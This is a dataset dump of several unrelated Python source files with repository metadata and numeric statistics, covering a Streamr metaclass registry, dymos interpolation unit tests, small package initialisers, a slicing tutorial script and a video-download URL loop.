| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0d7e49707275d39130f26dad1713cd2fe9540cfa
| 1,273
|
py
|
Python
|
streamr/protocol/util/meta.py
|
streamr-dev/streamr-client-python
|
8160df6d58cc124369bc47cf56245c7d17bf662f
|
[
"Apache-2.0"
] | 8
|
2019-06-13T04:02:55.000Z
|
2022-02-10T04:33:49.000Z
|
streamr/protocol/util/meta.py
|
streamr-dev/streamr-client-python
|
8160df6d58cc124369bc47cf56245c7d17bf662f
|
[
"Apache-2.0"
] | 3
|
2019-01-17T22:59:01.000Z
|
2021-11-06T16:49:14.000Z
|
streamr/protocol/util/meta.py
|
streamr-dev/streamr-client-python
|
8160df6d58cc124369bc47cf56245c7d17bf662f
|
[
"Apache-2.0"
] | 4
|
2019-01-27T14:02:07.000Z
|
2021-11-02T15:08:31.000Z
|
"""
Metaclasses of Response and Request
"""
class ResponseMeta(type):
"""
    Metaclass of Response
"""
response_class_by_response_type = {}
@classmethod
def register(mcs, clazz, typez):
"""
        Register a subclass in response_class_by_response_type
        :param clazz: the subclass to register
        :param typez: the message type key for the subclass
        :return: None
"""
mcs.response_class_by_response_type[typez] = clazz
def __new__(mcs, name, base, attrs):
clazz = super().__new__(mcs, name, base, attrs)
if name not in ['Response', 'ResendResponse']:
mcs.register(clazz, attrs['TYPE'])
return clazz
class RequestMeta(type):
"""
    Metaclass of Request
"""
response_class_by_response_type = {}
@classmethod
def register(mcs, clazz, typez):
"""
        Register a subclass in response_class_by_response_type
        :param clazz: the subclass to register
        :param typez: the message type key for the subclass
        :return: None
"""
mcs.response_class_by_response_type[typez] = clazz
def __new__(mcs, name, base, attrs):
clazz = super().__new__(mcs, name, base, attrs)
if name not in ['Request']:
mcs.register(clazz, attrs['TYPE'])
return clazz
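# A minimal sketch of the registry mechanics (class names hypothetical): any
# subclass that defines TYPE is registered automatically at class-creation
# time, while the base names excluded in __new__ are skipped.
class Response(metaclass=ResponseMeta):
    pass

class SubscribeResponse(Response):
    TYPE = 1

assert ResponseMeta.response_class_by_response_type[1] is SubscribeResponse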
| 23.574074
| 61
| 0.601728
| 148
| 1,273
| 4.905405
| 0.209459
| 0.107438
| 0.123967
| 0.190083
| 0.812672
| 0.812672
| 0.812672
| 0.713499
| 0.713499
| 0.713499
| 0
| 0
| 0.293794
| 1,273
| 53
| 62
| 24.018868
| 0.807564
| 0.251375
| 0
| 0.8
| 0
| 0
| 0.045067
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0d987b6c1952a95f579b63d2251b43ce982fb6cb
| 151
|
py
|
Python
|
cloudberry-py/cloudberry/api/model/series/__init__.py
|
olliekrk/cloud-berry
|
8b39fb0b4f8772348fb50c0c1d0200c96df03cbe
|
[
"MIT"
] | null | null | null |
cloudberry-py/cloudberry/api/model/series/__init__.py
|
olliekrk/cloud-berry
|
8b39fb0b4f8772348fb50c0c1d0200c96df03cbe
|
[
"MIT"
] | null | null | null |
cloudberry-py/cloudberry/api/model/series/__init__.py
|
olliekrk/cloud-berry
|
8b39fb0b4f8772348fb50c0c1d0200c96df03cbe
|
[
"MIT"
] | null | null | null |
from .data_point import DataPoint
from .data_series import DataSeries
from .data_series import SeriesInfo
from .data_series_pack import DataSeriesPack
| 30.2
| 44
| 0.86755
| 21
| 151
| 6
| 0.47619
| 0.253968
| 0.333333
| 0.31746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10596
| 151
| 4
| 45
| 37.75
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0da88be3b70b97bcdc7c4063084fa03f948b836b
| 222
|
py
|
Python
|
capacity/operators.py
|
JuanBalceda/python-basics
|
65649f1b5619efb1a4bb56abc904f848eb42a986
|
[
"MIT"
] | null | null | null |
capacity/operators.py
|
JuanBalceda/python-basics
|
65649f1b5619efb1a4bb56abc904f848eb42a986
|
[
"MIT"
] | null | null | null |
capacity/operators.py
|
JuanBalceda/python-basics
|
65649f1b5619efb1a4bb56abc904f848eb42a986
|
[
"MIT"
] | null | null | null |
print(divmod(100, 7))
print(7 > 2 and 1 > 6)
print(7 > 2 or 1 > 6)
number_list = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
print(number_list[2:8])
print(number_list[0:9:3])
print(number_list[0:10:3])
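# For reference, the expressions above evaluate to:
#   divmod(100, 7)       -> (14, 2)   (quotient, remainder)
#   7 > 2 and 1 > 6      -> False
#   7 > 2 or 1 > 6       -> True
#   number_list[2:8]     -> [4, 5, 6, 7, 8, 9]
#   number_list[0:9:3]   -> [2, 5, 8]
#   number_list[0:10:3]  -> [2, 5, 8, 11]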
| 22.2
| 67
| 0.576577
| 50
| 222
| 2.48
| 0.48
| 0.322581
| 0.362903
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.245714
| 0.211712
| 222
| 9
| 68
| 24.666667
| 0.462857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.857143
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
0dce0803053ef5c46622087ad9b526e24eeeee1a
| 1,592
|
py
|
Python
|
Video Downloader/run.py
|
legitshivam/PET
|
7d90aac36eadf6255cc4004f72e147987221826a
|
[
"MIT"
] | 1
|
2021-11-07T06:19:36.000Z
|
2021-11-07T06:19:36.000Z
|
Video Downloader/run.py
|
legitshivam/PET
|
7d90aac36eadf6255cc4004f72e147987221826a
|
[
"MIT"
] | null | null | null |
Video Downloader/run.py
|
legitshivam/PET
|
7d90aac36eadf6255cc4004f72e147987221826a
|
[
"MIT"
] | null | null | null |
from scrapper.cartoonsarea import download_link_generator, all_download_link_generator
if __name__ == '__main__':
url_list = ['https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-15-Dubbed-Videos/',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-15-Dubbed-Videos/?page=2',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-15-Dubbed-Videos/?page=3',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-16-Dubbed-Videos/',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-16-Dubbed-Videos/?page=2',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-17-Dubbed-Videos/',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-17-Dubbed-Videos/?page=2',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-17-Dubbed-Videos/?page=3',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-17-Dubbed-Videos/?page=4']
for url in url_list:
links = all_download_link_generator(url)
wait = input('\nNext-->')
exit()
| 66.333333
| 151
| 0.711055
| 223
| 1,592
| 4.995516
| 0.170404
| 0.193896
| 0.16158
| 0.185817
| 0.858169
| 0.858169
| 0.858169
| 0.858169
| 0.858169
| 0.858169
| 0
| 0.017229
| 0.125
| 1,592
| 23
| 152
| 69.217391
| 0.782484
| 0
| 0
| 0
| 0
| 0.6
| 0.746062
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0dfa4a7a1da5fa8586668c71b8a50e91252c069c
| 225
|
py
|
Python
|
rpmvenv/extensions/python/__init__.py
|
oleynikandrey/rpmvenv
|
694c32b2d240285bbae9eee590a39dcb34ef1e2c
|
[
"MIT"
] | 150
|
2015-03-11T15:38:36.000Z
|
2022-02-16T10:00:47.000Z
|
rpmvenv/extensions/python/__init__.py
|
oleynikandrey/rpmvenv
|
694c32b2d240285bbae9eee590a39dcb34ef1e2c
|
[
"MIT"
] | 70
|
2015-03-11T15:40:59.000Z
|
2022-01-15T15:48:16.000Z
|
rpmvenv/extensions/python/__init__.py
|
oleynikandrey/rpmvenv
|
694c32b2d240285bbae9eee590a39dcb34ef1e2c
|
[
"MIT"
] | 44
|
2015-03-22T22:26:15.000Z
|
2021-12-05T19:56:05.000Z
|
"""Core feature extensions for the project related to Python packaging."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
| 32.142857
| 74
| 0.848889
| 29
| 225
| 5.931034
| 0.655172
| 0.232558
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 225
| 6
| 75
| 37.5
| 0.868687
| 0.302222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
219a350a2b8e334b2e1cfc5e76aa31ca079b9079
| 15,489
|
py
|
Python
|
dymos/transcriptions/pseudospectral/components/test/test_state_interp_comp.py
|
naylor-b/dymos
|
56ee72041056ae20c3332d060e291c4da93844b1
|
[
"Apache-2.0"
] | null | null | null |
dymos/transcriptions/pseudospectral/components/test/test_state_interp_comp.py
|
naylor-b/dymos
|
56ee72041056ae20c3332d060e291c4da93844b1
|
[
"Apache-2.0"
] | null | null | null |
dymos/transcriptions/pseudospectral/components/test/test_state_interp_comp.py
|
naylor-b/dymos
|
56ee72041056ae20c3332d060e291c4da93844b1
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function, division, absolute_import
import unittest
import numpy as np
from numpy.testing import assert_almost_equal
from openmdao.api import Problem, Group, IndepVarComp
from openmdao.utils.assert_utils import assert_check_partials
from dymos.transcriptions.pseudospectral.components import StateInterpComp
from dymos.transcriptions.grid_data import GridData
from dymos.utils.lgr import lgr
SHOW_PLOTS = False
if SHOW_PLOTS:
import matplotlib.pyplot as plt
# Test 1: Let x = t**2, f = 2*t
def x(t):
return t ** 2
def f_x(t):
return 2 * t
# Test 2: Let v = t**3-10*t**2, f = 3*t**2 - 20*t
def v(t):
return t ** 3 - 10 * t ** 2
def f_v(t):
return 3 * t ** 2 - 20 * t
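# Sanity check (not part of the original test suite): f_x and f_v are the
# exact derivatives of x and v; second-order central differences via
# np.gradient reproduce them to O(h**2) away from the endpoints.
def _check_test_function_rates():
    t = np.linspace(0.0, 10.0, 1001)
    assert_almost_equal(np.gradient(x(t), t)[1:-1], f_x(t)[1:-1], decimal=3)
    assert_almost_equal(np.gradient(v(t), t)[1:-1], f_v(t)[1:-1], decimal=3)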
class TestStateInterpComp(unittest.TestCase):
def test_state_interp_comp_lobatto(self):
segends = np.array([0.0, 3.0, 10.0])
gd = GridData(num_segments=2,
transcription_order=3,
segment_ends=segends,
transcription='gauss-lobatto')
p = Problem(model=Group())
states = {'x': {'units': 'm', 'shape': (1,)},
'v': {'units': 'm/s', 'shape': (1,)}}
X_ivc = IndepVarComp()
p.model.add_subsystem('X_ivc', X_ivc, promotes=['state_disc:x', 'state_disc:v'])
X_ivc.add_output('state_disc:x', val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m')
X_ivc.add_output('state_disc:v', val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m/s')
F_ivc = IndepVarComp()
p.model.add_subsystem('F_ivc', F_ivc, promotes=['staterate_disc:x', 'staterate_disc:v'])
F_ivc.add_output('staterate_disc:x',
val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m/s')
F_ivc.add_output('staterate_disc:v',
val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m/s**2')
dt_dtau_ivc = IndepVarComp()
p.model.add_subsystem('dt_dstau_ivc', dt_dtau_ivc, promotes=['dt_dstau'])
dt_dtau_ivc.add_output('dt_dstau', val=0.0*np.zeros(gd.subset_num_nodes['col']), units='s')
p.model.add_subsystem('state_interp_comp',
subsys=StateInterpComp(transcription='gauss-lobatto',
grid_data=gd,
state_options=states,
time_units='s'))
p.model.connect('state_disc:x', 'state_interp_comp.state_disc:x')
p.model.connect('state_disc:v', 'state_interp_comp.state_disc:v')
p.model.connect('staterate_disc:x', 'state_interp_comp.staterate_disc:x')
p.model.connect('staterate_disc:v', 'state_interp_comp.staterate_disc:v')
p.model.connect('dt_dstau', 'state_interp_comp.dt_dstau')
p.setup(force_alloc_complex=True)
segends_disc = segends[np.array((0, 1, 1, 2), dtype=int)]
p['state_disc:x'] = [x(t) for t in segends_disc]
p['staterate_disc:x'] = [f_x(t) for t in segends_disc]
p['state_disc:v'] = [v(t) for t in segends_disc]
p['staterate_disc:v'] = [f_v(t) for t in segends_disc]
p['dt_dstau'] = (segends[1:] - segends[:-1]) / 2.0
p.run_model()
t_disc = segends_disc
t_col = (segends[1:] + segends[:-1]) / 2.0
if SHOW_PLOTS: # pragma: no cover
f, ax = plt.subplots(2, 1)
t = np.linspace(0, 10, 100)
x1 = x(t)
xdot1 = f_x(t)
x2 = v(t)
xdot2 = f_v(t)
ax[0].plot(t, x1, 'b-', label='$x$')
            ax[0].plot(t, xdot1, 'b--', label=r'$\dot{x}$')
ax[0].plot(t_disc, p['state_disc:x'], 'bo', label='$X_d:x$')
ax[0].plot(t_col, p['state_interp_comp.state_col:x'], 'bv', label='$X_c:x$')
ax[0].plot(t_col, p['state_interp_comp.staterate_col:x'], marker='v', color='None',
mec='b', label='$Xdot_c:x$')
ax[1].plot(t, x2, 'r-', label='$v$')
            ax[1].plot(t, xdot2, 'r--', label=r'$\dot{v}$')
ax[1].plot(t_disc, p['state_disc:v'], 'ro', label='$X_d:v$')
ax[1].plot(t_col, p['state_interp_comp.state_col:v'], 'rv', label='$X_c:v$')
ax[1].plot(t_col, p['state_interp_comp.staterate_col:v'], marker='v', color='None',
mec='r', label='$Xdot_c:v$')
ax[0].legend(loc='upper left', ncol=3)
ax[1].legend(loc='upper left', ncol=3)
plt.show()
# Test 1
assert_almost_equal(
p['state_interp_comp.state_col:x'][:, 0], x(t_col))
assert_almost_equal(
p['state_interp_comp.staterate_col:x'][:, 0], f_x(t_col))
# Test 2
assert_almost_equal(
p['state_interp_comp.state_col:v'][:, 0], v(t_col))
assert_almost_equal(
p['state_interp_comp.staterate_col:v'][:, 0], f_v(t_col))
cpd = p.check_partials(compact_print=True, method='cs')
assert_check_partials(cpd, atol=5.0E-5)
def test_state_interp_comp_lobatto_vectorized(self):
segends = np.array([0.0, 3.0, 10.0])
gd = GridData(num_segments=2,
transcription_order=3,
segment_ends=segends,
transcription='gauss-lobatto')
p = Problem(model=Group())
states = {'pos': {'units': 'm', 'shape': (2,)}}
X_ivc = IndepVarComp()
p.model.add_subsystem('X_ivc', X_ivc, promotes=['state_disc:pos'])
X_ivc.add_output('state_disc:pos',
val=np.zeros((gd.subset_num_nodes['state_disc'], 2)), units='m')
F_ivc = IndepVarComp()
p.model.add_subsystem('F_ivc', F_ivc, promotes=['staterate_disc:pos'])
F_ivc.add_output('staterate_disc:pos',
val=np.zeros((gd.subset_num_nodes['state_disc'], 2)),
units='m/s')
dt_dtau_ivc = IndepVarComp()
p.model.add_subsystem('dt_dstau_ivc', dt_dtau_ivc, promotes=['dt_dstau'])
dt_dtau_ivc.add_output('dt_dstau', val=0.0*np.zeros(gd.subset_num_nodes['col']), units='s')
p.model.add_subsystem('state_interp_comp',
subsys=StateInterpComp(transcription='gauss-lobatto',
grid_data=gd,
state_options=states,
time_units='s'))
p.model.connect('state_disc:pos', 'state_interp_comp.state_disc:pos')
p.model.connect('staterate_disc:pos', 'state_interp_comp.staterate_disc:pos')
p.model.connect('dt_dstau', 'state_interp_comp.dt_dstau')
p.setup(force_alloc_complex=True)
segends_disc = segends[np.array((0, 1, 1, 2), dtype=int)]
        p['state_disc:pos'][:, 0] = [x(t) for t in segends_disc]  # [0.0, 9.0, 9.0, 100.0]
p['staterate_disc:pos'][:, 0] = [f_x(t) for t in segends_disc]
p['state_disc:pos'][:, 1] = [v(t) for t in segends_disc]
p['staterate_disc:pos'][:, 1] = [f_v(t) for t in segends_disc]
p['dt_dstau'] = (segends[1:] - segends[:-1]) / 2.0
p.run_model()
t_disc = segends_disc
t_col = (segends[1:] + segends[:-1]) / 2.0
if SHOW_PLOTS: # pragma: no cover
f, ax = plt.subplots(2, 1)
print(t_disc)
print(t_col)
print(p['dt_dstau'])
print(p['state_disc:pos'][:, 0])
print(p['staterate_disc:pos'][:, 0])
print(p['state_disc:pos'][:, 0])
print(p['staterate_disc:pos'][:, 1])
t = np.linspace(0, 10, 100)
x1 = x(t)
xdot1 = f_x(t)
x2 = v(t)
xdot2 = f_v(t)
ax[0].plot(t, x1, 'b-', label='$x$')
            ax[0].plot(t, xdot1, 'b--', label=r'$\dot{x}$')
ax[0].plot(t_disc, p['state_disc:pos'][:, 0], 'bo', label='$X_d:pos$')
ax[0].plot(t_col, p['state_interp_comp.state_col:pos'][:, 0], 'bv', label='$X_c:pos$')
ax[0].plot(t_col, p['state_interp_comp.staterate_col:pos'][:, 0], marker='v',
color='None', mec='b', label='$Xdot_c:pos$')
ax[1].plot(t, x2, 'r-', label='$v$')
            ax[1].plot(t, xdot2, 'r--', label=r'$\dot{v}$')
ax[1].plot(t_disc, p['state_disc:pos'][:, 1], 'ro', label='$X_d:vel$')
ax[1].plot(t_col, p['state_interp_comp.state_col:pos'][:, 1], 'rv', label='$X_c:vel$')
ax[1].plot(t_col, p['state_interp_comp.staterate_col:pos'][:, 1], marker='v',
color='None', mec='r', label='$Xdot_c:vel$')
ax[0].legend(loc='upper left', ncol=3)
ax[1].legend(loc='upper left', ncol=3)
plt.show()
# Test 1
assert_almost_equal(
p['state_interp_comp.state_col:pos'][:, 0], x(t_col))
assert_almost_equal(
p['state_interp_comp.staterate_col:pos'][:, 0], f_x(t_col))
# Test 2
assert_almost_equal(
p['state_interp_comp.state_col:pos'][:, 1], v(t_col))
assert_almost_equal(
p['state_interp_comp.staterate_col:pos'][:, 1], f_v(t_col))
cpd = p.check_partials(compact_print=True, method='cs')
assert_check_partials(cpd, atol=5.0E-5)
def test_state_interp_comp_lobatto_vectorized_different_orders(self):
segends = np.array([0.0, 3.0, 10.0])
gd = GridData(num_segments=2,
transcription_order=[3, 5],
segment_ends=segends,
transcription='gauss-lobatto')
p = Problem(model=Group())
states = {'pos': {'units': 'm', 'shape': (2,)}}
X_ivc = IndepVarComp()
p.model.add_subsystem('X_ivc', X_ivc, promotes=['state_disc:pos'])
X_ivc.add_output('state_disc:pos',
val=np.zeros((gd.subset_num_nodes['state_disc'], 2)), units='m')
F_ivc = IndepVarComp()
p.model.add_subsystem('F_ivc', F_ivc, promotes=['staterate_disc:pos'])
F_ivc.add_output('staterate_disc:pos',
val=np.zeros((gd.subset_num_nodes['state_disc'], 2)),
units='m/s')
dt_dtau_ivc = IndepVarComp()
p.model.add_subsystem('dt_dstau_ivc', dt_dtau_ivc, promotes=['dt_dstau'])
dt_dtau_ivc.add_output('dt_dstau', val=0.0*np.zeros(gd.subset_num_nodes['col']), units='s')
p.model.add_subsystem('state_interp_comp',
subsys=StateInterpComp(transcription='gauss-lobatto',
grid_data=gd,
state_options=states,
time_units='s'))
p.model.connect('state_disc:pos', 'state_interp_comp.state_disc:pos')
p.model.connect('staterate_disc:pos', 'state_interp_comp.staterate_disc:pos')
p.model.connect('dt_dstau', 'state_interp_comp.dt_dstau')
p.setup(force_alloc_complex=True)
segends_disc = np.array((0, 3, 3, 6.5, 10))
        p['state_disc:pos'][:, 0] = [x(t) for t in segends_disc]  # [0.0, 9.0, 9.0, 42.25, 100.0]
p['staterate_disc:pos'][:, 0] = [f_x(t) for t in segends_disc]
p['state_disc:pos'][:, 1] = [v(t) for t in segends_disc]
p['staterate_disc:pos'][:, 1] = [f_v(t) for t in segends_disc]
p['dt_dstau'] = [3.0/2., 7.0/2, 7.0/2]
p.run_model()
cpd = p.check_partials(compact_print=True, method='cs')
assert_check_partials(cpd, atol=5.0E-5)
def test_state_interp_comp_radau(self):
gd = GridData(num_segments=1,
transcription_order=3,
segment_ends=np.array([0, 10]),
transcription='radau-ps')
p = Problem(model=Group())
states = {'x': {'units': 'm', 'shape': (1,)},
'v': {'units': 'm/s', 'shape': (1,)}}
X_ivc = IndepVarComp()
p.model.add_subsystem('X_ivc', X_ivc, promotes=['state_disc:x', 'state_disc:v'])
X_ivc.add_output('state_disc:x', val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m')
X_ivc.add_output('state_disc:v', val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m/s')
dt_dtau_ivc = IndepVarComp()
dt_dtau_ivc.add_output('dt_dstau', val=0.0*np.zeros(gd.subset_num_nodes['col']), units='s')
p.model.add_subsystem('dt_dstau_ivc', dt_dtau_ivc, promotes=['dt_dstau'])
p.model.add_subsystem('state_interp_comp',
subsys=StateInterpComp(transcription='radau-ps',
grid_data=gd,
state_options=states,
time_units='s'))
p.model.connect('state_disc:x', 'state_interp_comp.state_disc:x')
p.model.connect('state_disc:v', 'state_interp_comp.state_disc:v')
p.model.connect('dt_dstau', 'state_interp_comp.dt_dstau')
p.setup(force_alloc_complex=True)
lgr_nodes, lgr_weights = lgr(3, include_endpoint=True)
t_disc = (lgr_nodes + 1.0) * 5.0
t_col = t_disc[:-1]
# Test 1: Let x = t**2, f = 2*t
p['state_disc:x'] = t_disc**2
        # Test 2: Let v = t**3-10*t**2, f = 3*t**2 - 20*t
p['state_disc:v'] = t_disc**3-10*t_disc**2
p['dt_dstau'] = 10/2.0
p.run_model()
if SHOW_PLOTS: # pragma: no cover
f, ax = plt.subplots(2, 1)
t_disc = np.array([0, 5, 10])
t_col = np.array([2.5, 7.5])
t = np.linspace(0, 10, 100)
x1 = t**2
xdot1 = 2*t
x2 = t**3 - 10*t**2
xdot2 = 3*t**2 - 20*t
ax[0].plot(t, x1, 'b-', label='$x$')
            ax[0].plot(t, xdot1, 'b--', label=r'$\dot{x}$')
ax[0].plot(t_disc, p['state_disc:x'], 'bo', label='$X_d:x$')
ax[0].plot(t_col, p['state_interp_comp.state_col:x'], 'bv', label='$X_c:x$')
ax[0].plot(t_col, p['state_interp_comp.staterate_col:x'], marker='v', color='None',
mec='b', label='$Xdot_c:x$')
ax[1].plot(t, x2, 'r-', label='$v$')
            ax[1].plot(t, xdot2, 'r--', label=r'$\dot{v}$')
ax[1].plot(t_disc, p['state_disc:v'], 'ro', label='$X_d:v$')
ax[1].plot(t_col, p['state_interp_comp.state_col:v'], 'rv', label='$X_c:v$')
ax[1].plot(t_col, p['state_interp_comp.staterate_col:v'], marker='v', color='None',
mec='r', label='$Xdot_c:v$')
ax[0].legend(loc='upper left', ncol=3)
ax[1].legend(loc='upper left', ncol=3)
plt.show()
# Test 1
assert_almost_equal(
p['state_interp_comp.staterate_col:x'][:, 0], 2*t_col)
# Test 2
assert_almost_equal(
p['state_interp_comp.staterate_col:v'][:, 0], 3*t_col**2 - 20*t_col)
cpd = p.check_partials(compact_print=True, method='cs')
assert_check_partials(cpd, atol=1.0E-5)
if __name__ == '__main__':
unittest.main()
| 37.055024
| 99
| 0.532959
| 2,208
| 15,489
| 3.497736
| 0.072917
| 0.058268
| 0.085459
| 0.045578
| 0.883335
| 0.861453
| 0.852389
| 0.846174
| 0.845267
| 0.829729
| 0
| 0.029881
| 0.299955
| 15,489
| 417
| 100
| 37.143885
| 0.682376
| 0.019498
| 0
| 0.716846
| 0
| 0
| 0.191813
| 0.074484
| 0
| 0
| 0
| 0
| 0.057348
| 1
| 0.028674
| false
| 0
| 0.035842
| 0.014337
| 0.082437
| 0.043011
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21cbfe0f564cedab086fbfd82ee3a2cc479af7fc
| 228
|
py
|
Python
|
DAO/profile_dao.py
|
umagnanasundaram2128/WolfTrack3.0
|
3af060899a886cbbe0871f98d554f5f694b3e0f1
|
[
"MIT"
] | 2
|
2021-09-26T07:33:16.000Z
|
2021-09-30T06:07:47.000Z
|
DAO/profile_dao.py
|
umagnanasundaram2128/WolfTrack3.0
|
3af060899a886cbbe0871f98d554f5f694b3e0f1
|
[
"MIT"
] | 36
|
2021-09-26T23:32:19.000Z
|
2021-09-30T22:54:39.000Z
|
DAO/profile_dao.py
|
ArpithaVijayakumar/WolfTrack
|
2cfef76fa8235625ef66650321d182fc929b8eda
|
[
"MIT"
] | 7
|
2021-10-05T23:51:03.000Z
|
2021-11-15T03:34:01.000Z
|
from sql_helper import sql_helper
class profile_dao:
def create_profile(self):
pass
def get_profile(self):
pass
def update_profile(self):
pass
def delete_profile(self):
pass
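# Note: these are intentionally empty CRUD stubs; each method is expected to
# delegate to sql_helper once the corresponding queries are implemented.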
| 13.411765
| 33
| 0.627193
| 29
| 228
| 4.689655
| 0.482759
| 0.323529
| 0.441176
| 0.397059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.315789
| 228
| 16
| 34
| 14.25
| 0.871795
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0.1
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
0dfd0b6b79ad5b957197b9f7dfcf8fe13a2bef78
| 223
|
py
|
Python
|
carball/__init__.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 119
|
2018-09-14T02:14:19.000Z
|
2022-03-06T05:06:54.000Z
|
carball/__init__.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 207
|
2018-09-06T18:53:06.000Z
|
2022-02-12T22:39:36.000Z
|
carball/__init__.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 44
|
2018-09-10T16:54:13.000Z
|
2022-02-19T03:07:50.000Z
|
try:
from carball.decompile_replays import decompile_replay
from carball.decompile_replays import analyze_replay_file
except ModuleNotFoundError as e:
print("Not importing functions due to missing packages:", e)
| 44.6
| 64
| 0.811659
| 29
| 223
| 6.068966
| 0.724138
| 0.125
| 0.227273
| 0.306818
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143498
| 223
| 5
| 64
| 44.6
| 0.921466
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
df40571510307119e466305fffb65adf4405f177
| 16,906
|
py
|
Python
|
